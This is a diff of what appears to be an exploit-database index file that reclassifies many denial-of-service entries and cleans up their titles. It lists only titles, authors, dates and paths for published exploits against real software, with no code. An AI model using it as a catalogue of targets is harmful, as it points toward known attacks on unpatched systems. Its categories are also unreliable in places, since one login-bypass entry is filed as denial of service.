9975,platforms/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF",2009-11-16,"Alexey Sintsov",hardware,webapps,80 9978,platforms/php/webapps/9978.txt,"TwonkyMedia Server <= 4.4.17 & <= 5.0.65 - XSS",2009-10-23,"Davide Canali",php,webapps,0 9979,platforms/php/webapps/9979.txt,"Vivvo CMS 4.1.5.1 file disclosure",2009-10-22,"Janek Vind",php,webapps,0 -9980,platforms/hardware/webapps/9980.txt,"Websense Email Security DoS",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 +9980,platforms/hardware/dos/9980.txt,"Websense Email Security - DoS",2009-10-20,"Nikolas Sotiriu",hardware,dos,0 9981,platforms/hardware/webapps/9981.txt,"Websense Email Security xss",2009-10-20,"Nikolas Sotiriu",hardware,webapps,0 9983,platforms/windows/local/9983.pl,"Xion Audio Player 1.0 121 m3u file Buffer Overflow",2009-10-16,"Dragon Rider",windows,local,0 9984,platforms/windows/local/9984.py,"xp-AntiSpy 3.9.7-4 xpas file BoF",2009-10-26,Dr_IDE,windows,local,0 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 heap Overflow and null pointer dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 14273,platforms/linux/local/14273.sh,"Ubuntu PAM MOTD File Tampering (Privilege Escalation)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 -9987,platforms/multiple/remote/9987.txt,"ZoIPer Call-Info DoS",2009-10-14,"Tomer Bitton",multiple,remote,5060 +9987,platforms/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial Of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Local Privilege Escalation",2009-10-29,"bellick ",windows,local,0 9990,platforms/multiple/local/9990.txt,"Adobe Reader and Acrobat U3D File Invalid Array Index Remote Vulnerability",2009-11-09,"Felipe Andres Manzano",multiple,local,0 9991,platforms/windows/local/9991.txt,"AlleyCode 2.21 SEH Overflow PoC",2009-10-05,"Rafael Sousa",windows,local,0 @@ -9393,7 +9393,7 @@ id,file,description,date,author,platform,type,port 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 10020,platforms/linux/remote/10020.rb,"Borland InterBase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 -10022,platforms/linux/local/10022.c,"Linux Kernel - 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,local,0 +10022,platforms/linux/dos/10022.c,"Linux Kernel - 'unix_stream_connect()' Local Denial of Service Vulnerability",2009-11-10,"Tomoki Sekiyama",linux,dos,0 10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD 1.0 - 1.4 - Postfix Greylisting Buffer Overflow",2005-04-12,patrick,linux,remote,2525 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow",2006-12-08,"Julien Tinnes",linux,remote,0 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow",2000-04-16,patrick,linux,remote,143 @@ -9438,7 +9438,7 @@ id,file,description,date,author,platform,type,port 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer Overflow Exploit",2009-10-05,bruiser,windows,remote,0 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security Vulnerability",2009-11-12,"Marsh Ray",multiple,local,0 -10073,platforms/windows/remote/10073.py,"XM Easy Personal FTP 5.8 DoS",2009-10-02,PLATEN,windows,remote,21 +10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - DoS",2009-10-02,PLATEN,windows,dos,21 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030 10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local kernel Root Exploit",2009-10-02,mu-b,osx,local,0 @@ -9453,7 +9453,7 @@ id,file,description,date,author,platform,type,port 33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 -10083,platforms/php/remote/10083.txt,"PHP <=5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 +10083,platforms/php/remote/10083.txt,"PHP <= 5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation Vulnerability",2009-10-13,"Maxim A. Kulakov",windows,local,0 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 10086,platforms/multiple/remote/10086.txt,"WebKit 'Document()' Function Remote Information Disclosure Vulnerability",2009-11-12,"Chris Evans",multiple,remote,0 @@ -9543,8 +9543,8 @@ id,file,description,date,author,platform,type,port 10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection Vulnerability",2009-11-28,kaMtiEz,php,webapps,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability",2009-11-28,DigitALL,php,webapps,0 -10242,platforms/php/webapps/10242.txt,"PHP _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,webapps,0 -10243,platforms/php/webapps/10243.txt,"PHP MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,webapps,0 +10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - _multipart/form-data_ Denial of Service Exploit (Python)",2009-11-27,Eren,php,dos,0 +10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,dos,0 10244,platforms/windows/local/10244.txt,"MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 10245,platforms/php/webapps/10245.txt,"phpBazar <= 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0 10246,platforms/php/webapps/10246.txt,"SweetRice <= 0.5.3 - Remote File Include Vulnerability",2009-11-29,"cr4wl3r ",php,webapps,0 @@ -9613,7 +9613,7 @@ id,file,description,date,author,platform,type,port 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Shell Upload Vulnerability",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow Vulnerability",2009-02-03,"Wolfgang Hamann",multiple,local,0 -10327,platforms/multiple/local/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,local,0 +10327,platforms/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service Vulnerability",2009-04-01,"Red Hat",multiple,dos,0 10329,platforms/php/webapps/10329.txt,"AROUNDMe <= 1.1 (language_path) Remote File Include Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 10330,platforms/php/webapps/10330.txt,"elkagroup SQL Injection Vulnerability",2009-12-06,SadHaCkEr,php,webapps,0 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server Directory Transversal Vulnerability",2009-12-06,mr_me,windows,webapps,0 @@ -10169,7 +10169,7 @@ id,file,description,date,author,platform,type,port 11048,platforms/php/webapps/11048.txt,"Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability",2010-01-07,Sora,php,webapps,0 11051,platforms/php/webapps/11051.txt,"AutoIndex PHP Script (index.php) Directory Traversal Vulnerability",2010-01-07,Red-D3v1L,php,webapps,0 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service PoC",2010-01-07,anonymous,windows,dos,0 -11053,platforms/windows/dos/11053.py,"ttplayer=5.6Beta3 DoS PoC",2010-01-07,"t-bag YDteam",windows,dos,0 +11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - DoS PoC",2010-01-07,"t-bag YDteam",windows,dos,0 11057,platforms/php/webapps/11057.txt,"Read Excel Script 1.1 - Shell Upload Vulnerability",2010-01-07,Yozgat.Us,php,webapps,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE ActiveX Buffer Overflow Exploit",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 11060,platforms/php/webapps/11060.txt,"Drupal <= 6.15 - Multiple Permanent XSS (0day)",2010-01-07,emgent,php,webapps,80 @@ -10441,7 +10441,7 @@ id,file,description,date,author,platform,type,port 11394,platforms/php/webapps/11394.txt,"vBulletin 3.5.2 - XSS Vulnerabilities",2010-02-11,ROOT_EGY,php,webapps,0 11395,platforms/php/webapps/11395.txt,"vBulletin 3.0.0 - XSS Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 11396,platforms/php/webapps/11396.txt,"vBulletin 2.3.x - SQL Injection Vulnerability",2010-02-11,ROOT_EGY,php,webapps,0 -11397,platforms/php/webapps/11397.txt,"PHP Captcha Security Images DoS Vulnerability",2010-02-11,"cp77fk4r ",php,webapps,0 +11397,platforms/php/dos/11397.txt,"PHP Captcha Security Images - DoS Vulnerability",2010-02-11,"cp77fk4r ",php,dos,0 11398,platforms/php/webapps/11398.txt,"GameRoom Script Admin Bypass and File Upload Vulnerability",2010-02-11,JIKO,php,webapps,0 11399,platforms/php/webapps/11399.txt,"myPHP Guestbook <= 2.0.4 Database Backup Dump Vulnerability",2010-02-11,"ViRuSMaN ",php,webapps,0 11400,platforms/windows/local/11400.py,"Radasm 2.2.1.6 - (.rap) Universal Buffer Overflow Exploit",2010-02-11,Dz_attacker,windows,local,0 @@ -11133,7 +11133,7 @@ id,file,description,date,author,platform,type,port 12183,platforms/php/webapps/12183.txt,"Joomla Component com_jdrugstopics SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0 12184,platforms/php/webapps/12184.txt,"Joomla Component com_sermonspeaker SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0 12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent Local File Vulnerability",2010-04-12,eidelweiss,php,webapps,0 -12186,platforms/php/webapps/12186.pl,"vBulletin DoS - All Version",2010-04-12,"Jim Salim",php,webapps,0 +12186,platforms/php/dos/12186.pl,"vBulletin - DoS All Version",2010-04-12,"Jim Salim",php,dos,0 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string Vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 @@ -11434,7 +11434,7 @@ id,file,description,date,author,platform,type,port 12524,platforms/windows/dos/12524.py,"Windows SMB2 Negotiate Protocol (0x72) Response DoS",2010-05-07,"Jelmer de Hen",windows,dos,0 12525,platforms/php/webapps/12525.txt,"PHP-Nuke 'friend.php' Module Remote SQL Injection",2010-05-07,CMD,php,webapps,0 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability",2010-05-07,Ra3cH,asp,webapps,0 -12527,platforms/asp/webapps/12527.txt,"Administrador de Contenidos Admin Login Bypass Vulnerability",2010-05-07,Ra3cH,asp,webapps,0 +12527,platforms/asp/dos/12527.txt,"Administrador de Contenidos - Admin Login Bypass Vulnerability",2010-05-07,Ra3cH,asp,dos,0 12528,platforms/windows/local/12528.pl,"AVCON H323Call Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS (Meta)",2010-05-08,"Jeremiah Talamantes",windows,dos,0 @@ -11708,7 +11708,7 @@ id,file,description,date,author,platform,type,port 12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) Local File Inclusion Vulnerability",2010-06-02,AntiSecurity,php,webapps,0 12849,platforms/php/webapps/12849.txt,"slogan design Script SQL Injection Vulnerability",2010-06-03,Mr.P3rfekT,php,webapps,0 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP SQL Injection Vulnerability",2010-06-03,v4lc0m87,php,webapps,0 -12852,platforms/windows/webapps/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,webapps,0 +12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote DoS/Crash Exploit",2010-06-03,PoisonCode,windows,dos,0 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1",2010-06-03,b0nd,windows,dos,0 12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - RFI Vulnerability",2010-06-03,Sid3^effects,php,webapps,0 12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 (REMOTE FILE UPLOAD) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 @@ -15655,7 +15655,7 @@ id,file,description,date,author,platform,type,port 18020,platforms/php/webapps/18020.txt,"jara 1.6 - SQL Injection Vulnerability",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 -18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0 +18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - DoS",2011-10-23,Alguien,php,dos,0 18024,platforms/windows/dos/18024.txt,"Win32k Null Pointer De-reference Vulnerability PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0 18025,platforms/multiple/dos/18025.txt,"Google Chrome Denial of Service (DoS)",2011-10-23,"Prashant Uniyal",multiple,dos,0 18042,platforms/php/webapps/18042.txt,"Techfolio 1.0 Joomla Component SQL Injection Vulnerability",2011-10-28,"Chris Russell",php,webapps,0 @@ -16477,7 +16477,7 @@ id,file,description,date,author,platform,type,port 19072,platforms/linux/local/19072.txt,"ISC BIND 4.9.7 -T1B named SIGINT and SIGIOT symlink Vulnerability",1998-04-10,"Joe H",linux,local,0 19073,platforms/linux/local/19073.txt,"Slackware Linux 3.4 - netconfig temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 19074,platforms/linux/local/19074.txt,"Slackware Linux 3.4 - pkgtool temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 -19075,platforms/linux/remote/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service Vulnerability",1998-04-10,Schlossnagle,linux,remote,0 +19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service Vulnerability",1998-04-10,Schlossnagle,linux,dos,0 19076,platforms/linux/remote/19076.txt,"Apple Personal Web Sharing 1.1 Vulnerability",1998-04-10,"Netstat Webmaster",linux,remote,0 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (1)",1998-05-05,jamez,linux,local,0 19078,platforms/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (2)",1998-05-05,pr10n,linux,local,0 @@ -16600,7 +16600,7 @@ id,file,description,date,author,platform,type,port 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability",1999-05-17,"David Litchfield",windows,local,0 19210,platforms/irix/local/19210.txt,"SGI IRIX <= 6.5.4 midikeys Root Vulnerability",1999-05-19,"W. Cashdollar",irix,local,0 19211,platforms/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability",1999-05-20,"David Litchfield",windows,local,0 -19212,platforms/multiple/remote/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,remote,0 +19212,platforms/multiple/dos/19212.txt,"Behold! Software Web Page Counter 2.7 - Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,dos,0 19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 19214,platforms/aix/local/19214.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (2)",1999-05-22,"Georgi Guninski",aix,local,0 19215,platforms/aix/local/19215.c,"IBM AIX <= 4.2.1_ Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (3)",1999-05-22,UNYUN,aix,local,0 @@ -16618,7 +16618,7 @@ id,file,description,date,author,platform,type,port 19227,platforms/windows/local/19227.txt,"IBM Remote Control Software 1.0 Vulnerability",1999-05-10,"Thomas Krug",windows,local,0 19228,platforms/multiple/dos/19228.pl,"Microsoft IIS 4.0_Microsoft JET 3.5/3.5.1 Database Engine VBA Vulnerability",1999-05-25,"J. Abreu Junior",multiple,dos,0 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0 -19230,platforms/multiple/remote/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service Vulnerability",1999-05-11,"Chris Radigan",multiple,remote,0 +19230,platforms/multiple/dos/19230.txt,"Symantec PCAnywhere32 8.0 - Denial of Service Vulnerability",1999-05-11,"Chris Radigan",multiple,dos,0 19231,platforms/windows/remote/19231.rb,"PHP apache_request_headers Function Buffer Overflow",2012-06-17,metasploit,windows,remote,0 19232,platforms/solaris/local/19232.txt,"SunOS <= 4.1.4 arp(8c) Memory Dump Vulnerability",1994-02-01,anonymous,solaris,local,0 19233,platforms/solaris/local/19233.txt,"Solaris <= 7.0 aspppd Insecure Temporary File Creation Vulnerability",1996-12-20,Al-Herbish,solaris,local,0 @@ -16626,7 +16626,7 @@ id,file,description,date,author,platform,type,port 19235,platforms/solaris/local/19235.txt,"Solaris <= 7.0 chkperm Vulnerability",1996-12-05,"Kevin L Prigge",solaris,local,0 19236,platforms/solaris/remote/19236.txt,"Solaris <= 7.0 Coredump Vulnerbility",1996-08-03,"Jungseok Roh",solaris,remote,0 19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 SPAM Relay Vulnerability",1999-06-08,Geo,aix,remote,0 -19238,platforms/windows/remote/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,remote,0 +19238,platforms/windows/dos/19238.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 - DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,dos,0 19239,platforms/windows/remote/19239.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability",1999-06-04,"Scott Danahy",windows,remote,0 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0 19241,platforms/linux/remote/19241.c,"Linux Kernel 2.2/2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Vulnerability",1999-06-01,"Piotr Wilkin",linux,remote,0 @@ -16670,7 +16670,7 @@ id,file,description,date,author,platform,type,port 19279,platforms/linux/local/19279.sh,"RedHat Linux 2.1 - abuse.console Vulnerability",1996-02-02,"David J Meltzer",linux,local,0 19280,platforms/irix/local/19280.txt,"SGI IRIX <= 6.2 fsdump Vulnerability",1996-12-03,"Jaechul Choe",irix,local,0 19281,platforms/linux/local/19281.c,"RedHat Linux 5.1 xosview Vulnerability",1999-05-28,"Chris Evans",linux,local,0 -19282,platforms/linux/remote/19282.c,"Linux kernel 2.0 Sendmail Denial of Service Vulnerability",1999-05-28,"Michal Zalewski",linux,remote,0 +19282,platforms/linux/dos/19282.c,"Linux Kernel 2.0 Sendmail - Denial of Service Vulnerability",1999-05-28,"Michal Zalewski",linux,dos,0 19283,platforms/linux/local/19283.c,"Slackware Linux 3.1 - Buffer Overflow Vulnerability",1997-03-04,Solar,linux,local,0 19284,platforms/linux/local/19284.c,"Armidale Software Yapp Conferencing System 2.2 - Buffer Overflow Vulnerability",1998-01-20,satan,linux,local,0 19285,platforms/linux/local/19285.txt,"Slackware Linux 3.1 / 3.2 - color_xterm Buffer Overflow Vulnerability (1)",1997-05-27,zgv,linux,local,0 @@ -16807,7 +16807,7 @@ id,file,description,date,author,platform,type,port 19438,platforms/osx/local/19438.txt,"Ogopogo Autothenticate 1.1.5 Weak Password Encryption Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 19439,platforms/osx/local/19439.txt,"Power On Software On Guard for MacOS 3.2 Emergency Password Vulnerability",1999-07-29,"Prozaq of mSec",osx,local,0 19440,platforms/windows/local/19440.c,"Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability",1999-07-30,"David Litchfield",windows,local,0 -19441,platforms/hardware/remote/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,remote,0 +19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service Attack",1999-07-30,"Mike Frantzen",hardware,dos,0 19442,platforms/windows/remote/19442.html,"Compaq Java Applet for Presario SpawnApp Vulnerability",1998-11-28,"Frank Farance",windows,remote,0 19443,platforms/multiple/remote/19443.txt,"Netscape Enterprise Server 3.51/3.6 JHTML View Source Vulnerability",1999-07-30,"David Litchfield",multiple,remote,0 19444,platforms/hardware/remote/19444.txt,"Network Security Wizards Dragon-Fire IDS 1.0 Vulnerability",1999-08-05,"Stefan Lauda",hardware,remote,0 @@ -16828,7 +16828,7 @@ id,file,description,date,author,platform,type,port 19460,platforms/multiple/local/19460.sh,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (1)",1999-08-16,"Brock Tellier",multiple,local,0 19461,platforms/multiple/local/19461.c,"Oracle <= 8 8.1.5 Intelligent Agent Vulnerability (2)",1999-08-16,"Gilles PARC",multiple,local,0 19462,platforms/windows/local/19462.c,"Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability",1999-08-16,"Jeremy Kothe",windows,local,0 -19463,platforms/linux/remote/19463.c,"S.u.S.E. Linux <= 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,remote,0 +19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux <= 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,dos,0 19464,platforms/linux/local/19464.c,"RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (1)",1999-08-18,m0f0,linux,local,0 19465,platforms/linux/local/19465.c,"RedHat Linux <= 6.0_ Slackware Linux <= 4.0 Termcap tgetent() Buffer Overflow (2)",1999-08-18,sk8,linux,local,0 19466,platforms/multiple/remote/19466.txt,"Hughes Technologies Mini SQL (mSQL) 2.0/2.0.10 Vulnerability",1999-08-18,"Gregory Duchemin",multiple,remote,0 @@ -16853,7 +16853,7 @@ id,file,description,date,author,platform,type,port 19485,platforms/linux/local/19485.c,"Martin Stover Mars NWE 0.99 - Buffer Overflow Vulnerabilities",1999-08-31,"Przemyslaw Frasunek",linux,local,0 19486,platforms/windows/remote/19486.c,"Netscape Communicator 4.06/4.5/4.6/4.51/4.61 EMBED Buffer Overflow Vulnerability",1999-09-02,"R00t Zer0",windows,remote,0 19487,platforms/windows/remote/19487.txt,"Microsoft Internet Explorer 4.0/5.0 - ActiveX _Eyedog_ Vulnerability",1999-08-21,"Shane Hird's",windows,remote,0 -19488,platforms/bsd/local/19488.c,"FreeBSD <= 5.0_NetBSD <= 1.4.2_OpenBSD <= 2.7 setsockopt() DoS",1999-09-05,"L. Sassaman",bsd,local,0 +19488,platforms/bsd/dos/19488.c,"FreeBSD <= 5.0_NetBSD <= 1.4.2_OpenBSD <= 2.7 setsockopt() - DoS",1999-09-05,"L. Sassaman",bsd,dos,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 DCOM Server Vulnerability",1999-09-08,Mnemonix,windows,dos,0 19490,platforms/windows/remote/19490.txt,"Microsoft Internet Explorer 4.0.1/5.0 Import/Export Favorites Vulnerability",1999-09-10,"Georgi Guninski",windows,remote,0 19491,platforms/windows/remote/19491.txt,"BindView HackerShield 1.0/1.1 HackerShield AgentAdmin Password Vulnerability",1999-09-10,anonymous,windows,remote,0 @@ -16870,7 +16870,7 @@ id,file,description,date,author,platform,type,port 19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0 19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0 19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0 -19505,platforms/freebsd/local/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,local,0 +19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0 19507,platforms/solaris/remote/19507.txt,"Solaris <= 7.0 Recursive mutex_enter Panic Vulnerability",1999-09-23,"David Brumley",solaris,remote,0 19508,platforms/linux/local/19508.sh,"S.u.S.E. Linux 6.2 sscw HOME Environment Variable Buffer Overflow Vulnerability",1999-09-23,"Brock Tellier",linux,local,0 @@ -16878,7 +16878,7 @@ id,file,description,date,author,platform,type,port 19510,platforms/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation Vulnerability",1999-09-17,"Tymm Twillman",linux,local,0 19511,platforms/linux/local/19511.c,"Knox Software Arkeia 4.0 Backup Local Overflow",1999-09-26,"Brock Tellier",linux,local,0 19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0 -19513,platforms/hardware/remote/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 DoS",1999-09-27,"Bjorn Stickler",hardware,remote,0 +19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0 19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0 @@ -16905,7 +16905,7 @@ 